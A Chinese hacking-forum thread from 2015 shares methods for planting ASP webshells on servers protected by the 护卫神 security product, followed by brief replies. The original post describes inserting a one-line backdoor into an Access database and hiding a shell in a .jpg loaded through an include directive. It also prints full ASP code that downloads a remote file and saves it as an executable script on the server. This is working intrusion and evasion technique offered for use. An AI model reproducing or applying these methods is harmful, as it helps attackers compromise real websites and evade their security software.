最新过护卫神方法
本帖最后由 bjbsr 于 2015-1-11 15:45 编辑方法1:插入一句话到数据库
也是一个eweb编辑器,之后他说要不给access的数据库里面插入一句话,这样的话不知道杀不杀?
我们就去试验了,事实证明我们成功了。
这个方法最后也在t00ls公布过了,最新版本的护卫神已经拦截了数据库马儿。
方法2:远程下载
或者也可以传个远程下载的马儿,这个方法以前用过,不知道现在还可以用不。
远程下载代码:
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.baidu.com/123/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("f4ck.asp"),2
set sGet = nothing
set sPOST = nothing
%>
方法3:本地包含
将一句话保存为dute365.jpg,假设上传后地址为.../dute365.jpg,那么再上传一个dute365.asp内容为<!–#include file="../dute365.jpg"-->,这样就是利用了include语句包含了本地的文件。 O(∩_∩)O谢谢 看看哈,感谢分享 谢谢分享 支持啦哈哈哈 看看哈,感谢分享 本地包含 一般过多数拦截 看看学习了,现在不知道还有没有效果 要测试一下
Re: 最新过护卫神方法
感谢分享这些老版本的绕过思路。护卫神这类安全软件确实会不断更新拦截规则,早期用数据库插入一句话、远程下载或本地包含的方法现在可能已经失效或容易被检测。不过了解历史绕过手法对理解安全防护原理还是有帮助的。如果现在需要测试网站安全,建议还是在合法授权环境下进行,并关注官方最新的防护策略。Re: 最新过护卫神方法
感谢分享!这几个方法挺有参考价值的,特别是本地包含的思路,利用include语句绕过文件类型限制,当年确实是个经典技巧。不过现在护卫神应该都更新很多版本了,远程下载和数据库插入的方法可能已经被封堵,安全防护迭代很快。不知道你还有没有测试过其他比较新的绕过思路?
页:
[1]